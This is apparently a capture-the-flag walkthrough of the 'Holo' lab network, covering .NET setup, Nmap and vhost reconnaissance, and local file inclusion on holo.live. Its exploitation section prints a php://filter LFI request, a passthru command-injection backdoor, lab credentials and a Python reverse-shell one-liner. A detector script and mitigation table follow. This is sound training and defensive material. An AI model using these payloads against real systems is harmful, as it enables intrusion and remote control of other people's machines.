Peace be upon you, and the mercy and blessings of Allah.
Course link: http://iswy.co/e28dqd
O Allah, teach us what benefits us, benefit us with what You have taught us, and increase us in knowledge.
Intro
In this lab, you will learn and explore the following topics:
- .NET basics
- Web application exploitation
- AV evasion
- Whitelist and container escapes
- Pivoting
- Operating with a C2 (Command and Control) Framework
- Post-Exploitation
- Situational Awareness
- Active Directory attacks
You will learn and exploit the following attacks and misconfigurations:
- Misconfigured subdomains
- Local file Inclusion
- Remote code execution
- Docker containers
- SUID binaries
- Password resets
- Client-side filters
- AppLocker
- Vulnerable DLLs
- Net-NTLMv2 / SMB
Scope
IP | OS
---|---
10.200.112.30 | Windows
10.200.112.33 | Linux
10.200.112.250 | Linux
------------------------------------------------------------------------------------------------------------------
Dot NET
.NET uses a run-time environment known as the **Common Language Runtime (CLR)**. It comes in two flavours: .NET Framework (Windows only) and .NET Core (cross-platform). .NET code is compiled to an **exe** or a dll.
Visual Studio is not the only C# compiler, and there are several other compilers outlined below.
- Roslyn
- GCC
- MinGW
- LLVM
- TCC
- MSBuild
To begin using Visual Studio, you will need a valid Microsoft/Outlook account to sign in and authenticate to Visual Studio. It is a simple and free process to create an account if you do not already have one. For more information, check out the Outlook page, https://outlook.live.com/owa/.
We will begin our compiling journey by creating and building a solution file from the code we wrote in the previous task.
To create a solution file for .NET Core, navigate to Create a new project > Console App (.NET Core). If you want to open a pre-existing solution file/project, navigate to Open a project or solution.
From here, you can configure your project's Name, Location, and Solution Name. Find a screenshot of the configuration menu below.
Once created, Visual Studio will automatically add a starting C# hello world file and maintain the solution file for building. Find a screenshot of the file structure below.
You will notice that Visual Studio will break down the Dependencies, Classes, and Methods in this file tree, which can be helpful when debugging or analyzing code.
From here, we should have a working, automatically generated C# hello world file that we can use to test our build process. To build a solution file, navigate to Build > Build Solution or press Ctrl+Shift+B. You can also build from applications themselves rather than project solutions; however, that is out of scope for this network. Once run, the console tab should open or begin outputting information. From here, you can monitor the build process and any errors that may occur. If successful, it will output Build: 1 succeeded and the path to the compiled file. Find a screenshot of the build process below.
You should now have a successfully compiled file that you can run and use on other systems with corresponding .NET versions!
It is important to note that when building other developers' tools, they will often contain several dependencies and packages. Ensure the machine you are using to build the solution has internet access so it can retrieve the needed packages.
Dot NET Linux
Install the SDK and runtime (Arch):
yay -S dotnet-runtime dotnet-sdk dotnet-host
Create a new console project and open it in VS Code:
dotnet new console -o holo
code .
then press Ctrl+Shift+P for the command palette.
Build and run the project:
dotnet run
Cyber Kill Chain
Reconnaissance
Let's start with Nmap: nmap -sCV -p- -vv -T4 --open -oN nmap $IP/24
PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 f7:85:b5:ac:29:88:75:32:33:bf:e8:d7:14:44:c7:c9 (RSA)
|   256 28:ec:98:a6:5d:8b:6f:86:01:cc:70:b1:41:29:3f:02 (ECDSA)
|   256 9c:26:c4:87:f0:6f:62:85:e1:3f:99:80:16:b9:b3:8c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDy0yWuB1wlRmhp2RvunGIw+/FoyPg6TOmT820bSAiIu
80/tcp    open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: holo.live
|_http-generator: WordPress 5.5.3
| http-robots.txt: 21 disallowed entries
| /var/www/wordpress/index.php
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade
| /var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
| /var/www/wordpress/wp-config-sample.php /var/www/wordpress/wp-cron.php
| /var/www/wordpress/wp-links-opml.php /var/www/wordpress/wp-login.php
|_/var/www/wordpress/wp-settings.php /var/www/wordpress/wp-trackback.php
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
33060/tcp open  mysqlx? syn-ack
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.200.112.250 (10.200.112.250)
Host is up, received conn-refused (0.18s latency).
Scanned at 2022-08-18 15:54:52 EET for 405s
Not shown: 58046 closed tcp ports (conn-refused), 7487 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 0f:6f:f4:97:a2:f1:7a:6a:9c:44:fe:e0:09:05:dd:c6 (RSA)
|   256 59:bd:f8:47:fc:1e:3a:2f:98:fd:84:5f:11:84:f1:84 (ECDSA)
|   256 f4:cc:6c:f2:ca:dc:fa:74:68:eb:25:b7:f6:ac:09:de (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPNaVUVAXaWlep3lha3tW0wtxdr7YUb0Ni/AwvoKWMnY
1337/tcp open  http    syn-ack Node.js Express framework
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Error
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 18 16:01:37 2022 -- 256 IP addresses (2 hosts up) scanned in 426.52 seconds
---------------------------------------------------------------------------------------------
Machine: "L-SRV01"
Start with port 80:
We need to add holo.live to our /etc/hosts. This file acts as a local DNS service for your machine and overrides the mappings from the DNS server your machine is connected to over the network.
Now let's run whatweb to identify the website's CMS and technology stack, or you could use Wappalyzer.
Now let's discover vhosts with Gobuster or ffuf:
gobuster vhost -u http://www.holo.live/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
ffuf -u http://holo.live/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.holo.live" -fs 21456 ## vhost
We found admin and dev; now add them to your /etc/hosts.
After that, let's perform directory brute-forcing on admin.holo.live and dev.holo.live.
admin.holo.live
Take a look at robots.txt.
We found some interesting files; if you navigate to any of them, you get HTTP 403 Forbidden.
dev.holo.live
To find where the images are stored, hover your mouse over any picture and look at the bottom left of the page, where the browser shows the image's URL.
Set up the test environment → for exploitation
apt install apache2 php (Debian-based) / yay -S httpd php (Arch)
# edit the configuration files to use port 8080
systemctl start apache2 (Debian-based) / systemctl start httpd (Arch)
wget https://github.com/Sq00ky/holo-bash-portscanner/raw/main/holo-playground.zip -O /var/www/holo.zip && unzip /var/www/holo.zip
Exploitation
Local File Inclusion (LFI) is an attack technique in which attackers trick a web application into either running or exposing files on the web server.
I know you forget things, so I'm leaving this note for you: admin:DBManagerLogin! - gurag <3
Now we can try to log in to admin.holo.live with these credentials,
and we are in.
Local File Inclusion (LFI) to Remote Code Execution (RCE)
Method 1
curl "http://dev.holo.live/img.php?file=php://filter/convert.base64-encode/resource=/var/www/admin/dashboard.php" | base64 -d
Search the decoded source for cmd and you will find:
<?php if ($_GET['cmd'] === NULL) { echo passthru("cat /tmp/Views.txt"); } else { echo passthru($_GET['cmd']);}?> Visitors today</h4>
We can see the passthru() function. passthru() is similar to exec() in that it executes an external command; here the command comes straight from the cmd GET parameter.
Now we can use ?cmd=<command> → http://admin.holo.live/dashboard.php?cmd=id
Method 2
First check which Python interpreter is available: http://admin.holo.live/dashboard.php?cmd=which%20python3
Then pass a reverse shell as the cmd value:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.50.109.169",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
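From the defender's side, both steps above leave a distinctive trace in the web server's access log. The following Python detector is an added example, not part of the original writeup or the lab, and flags the two request shapes used here: a php:// wrapper or traversal sequence in img.php?file= and any use of the cmd parameter on dashboard.php. The sample log lines are constructed, and the script names (img.php, dashboard.php) are the ones from this writeup.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A file= parameter should name an image, never a PHP stream wrapper
# (php://filter is what exposed dashboard.php's source) or a traversal sequence.
LFI_MARKERS = ("php://", "data://", "expect://", "../", "..\\")


def classify(line):
    """Return finding tags for one access-log line ([] when it looks benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes, so ..%2F..%2F is caught as well as ../../
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if any(marker in value.lower()
           for value in params.get("file", []) for marker in LFI_MARKERS):
        findings.append("lfi")
    # dashboard.php has no legitimate cmd parameter, so any use of it is suspect.
    if parts.path.endswith("/dashboard.php") and "cmd" in params:
        findings.append("cmd")
    return findings


def scan(lines):
    """Map each flagged request target to its findings; benign lines are skipped."""
    report = {}
    for line in lines:
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line)
            report[m.group("target") if m else line] = tags
    return report


# Constructed sample lines: the php://filter read and ?cmd=id from this writeup,
# plus one benign image request.
SAMPLE_LOG = [
    '10.50.0.5 - - [18/Aug/2022:16:10:01 +0200] "GET /img.php?file=php://filter/'
    'convert.base64-encode/resource=/var/www/admin/dashboard.php HTTP/1.1" 200 5120 "-" "curl/7.84.0"',
    '10.50.0.5 - - [18/Aug/2022:16:12:44 +0200] "GET /dashboard.php?cmd=id HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '10.50.0.9 - - [18/Aug/2022:16:13:02 +0200] "GET /img.php?file=logo.png HTTP/1.1" 200 9010 "-" "Mozilla/5.0"',
]
```

Running scan(SAMPLE_LOG) reports the first two requests as lfi and cmd respectively and skips the benign image request; percent-encoded traversal such as ..%2F..%2Fetc%2Fpasswd is decoded before matching.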
Vulnerability summary
Vulnerability | Impact | Mitigation
---|---|---
Local File Inclusion (LFI) | High | Use whitelisting; do not build file names from user input.
Remote Code Execution (RCE) | High | When user-supplied data must be passed to a shell function, sanitize it with escapeshellarg() or escapeshellcmd() rather than passing it raw to passthru() or exec(), so that users cannot trick the system into executing arbitrary commands.